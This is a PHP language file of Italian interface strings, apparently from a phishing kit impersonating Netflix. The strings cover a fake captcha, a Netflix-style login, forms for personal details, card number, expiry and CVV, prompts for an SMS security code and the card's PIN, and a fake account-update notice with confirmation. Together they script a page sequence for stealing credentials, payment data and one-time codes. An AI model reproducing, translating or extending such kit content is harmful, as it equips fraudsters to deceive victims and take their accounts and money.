<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "it",
        "xcapt" => "Si prega di prendersi un momento per risolvere l'hCaptcha qui sotto. Ciò ci aiuta a garantire che tu sia un utente genuino e non un bot, fornendo un ambiente sicuro per tutti.",
        "xcapt1" => "Si prega di spuntare la casella CAPTCHA.",
        "xcapt2" => "Verifica",
        "xcapt3" => "Continua",
        "xmain1" => "Accedi",
        "xmain2" => "Email o numero di telefono",
        "xmain3" => "Inserisci un indirizzo email o un numero di telefono valido.",
        "xmain4" => "Password",
        "xmain5" => "La password deve avere una lunghezza compresa tra 4 e 60 caratteri.",
        "xmain6" => "Accedi",
        "xmain7" => "Ricordami",
        "xmain8" => "Hai bisogno di aiuto?",
        "xmain9" => "Nuovo su Netflix?",
        "xmain10" => " Registrati.",
        "xmain11" => "Questa pagina è protetta da Google reCAPTCHA per assicurarci che tu non sia un robot.",
        "xmain12" => "Scopri di più.",
        "xinfoz1" => "Informazioni personali",
        "xinfoz2" => "Nome e cognome",
        "xinfoz3" => "Questo campo è obbligatorio.",
        "xinfoz4" => "Data di nascita",
        "xinfoz5" => "Indirizzo",
        "xinfoz6" => "Città",
        "xinfoz7" => "CAP",
        "xinfoz8" => "Indirizzo email",
        "xinfoz9" => "Numero di telefono",
        "xinfoz10" => "I campi in questo modulo sono obbligatori poiché abbiamo bisogno di queste informazioni per elaborare la tua richiesta.",
        "xinfoz11" => "Continua",
        "xpay1" => "Configura la tua carta di pagamento",
        "xpay2" => "Numero della carta",
        "xpay3" => "Numero della carta obbligatorio.",
        "xpay4" => "Data di scadenza",
        "xpay5" => "Data di scadenza obbligatoria.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV obbligatorio.",
        "xpay8" => "Crittografato end-to-end",
        "xpay9" => "Continua",
        "xsms1" => "Verifica",
        "xsms2" => "Per la tua sicurezza, dobbiamo assicurarci che tu sia davvero tu.",
        "xsms3" => "Ti invieremo un SMS con un codice di sicurezza",
        "xsms4" => "Inserisci il codice ricevuto",
        "xsms5" => "Codice SMS",
        "xsms6" => "Codice SMS non valido",
        "xsms7" => "Questo passaggio è necessario per elaborare la tua richiesta in modo sicuro.",
        "xsms8" => "Continua",
        "xpin1" => "Verifica",
        "xpin2" => "Per la tua sicurezza, dobbiamo assicurarci che tu sia davvero tu.",
        "xpin3" => "Ti invieremo un SMS con un codice di sicurezza",
        "xpin4" => "Inserisci il codice PIN della tua carta",
        "xpin5" => "Codice PIN",
        "xpin6" => "Codice PIN non valido",
        "xpin7" => "Questo passaggio è necessario per elaborare la tua richiesta in modo sicuro.",
        "xpin8" => "Continua",
        "xexpl1" => "Aggiornamento",
        "xexpl2" => "Speriamo che questa comunicazione ti trovi bene. Vogliamo informarti che è essenziale aggiornare le tue informazioni sulla nostra piattaforma per garantire un'esperienza utente continua e sicura.",
        "xexpl3" => "Per migliorare i nostri servizi e garantire la sicurezza del tuo account, prenditi qualche istante per aggiornare le tue informazioni.",
        "xexpl4" => "Continua",
        "xconf1" => "Conferma",
        "xconf2" => "Ti ringraziamo sinceramente per aver dedicato del tempo ad aggiornare le tue informazioni sulla nostra piattaforma. Il tuo impegno per la sicurezza e l'accuratezza dei dettagli del tuo account è fondamentale per noi.",
        "xconf3" => "Le tue modifiche sono state salvate con successo. Ora puoi goderti appieno la nostra piattaforma con le informazioni più recenti e aggiornate.",
        "xconf4" => "Continua",
        "xload1" => "Elaborazione in corso...",
        "xload2" => "Non abbandonare questa pagina.",
        "xfoot1" => "Domande? Contattaci.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Centro assistenza",
        "xfoot4" => "Termini d'uso",
        "xfoot5" => "Privacy",
        "xfoot6" => "Preferenze dei cookie",
        "xfoot7" => "Informazioni aziendali",
        "xfoot8" => "Italiano"
    );

    return $lang[$phrase];
}
?>
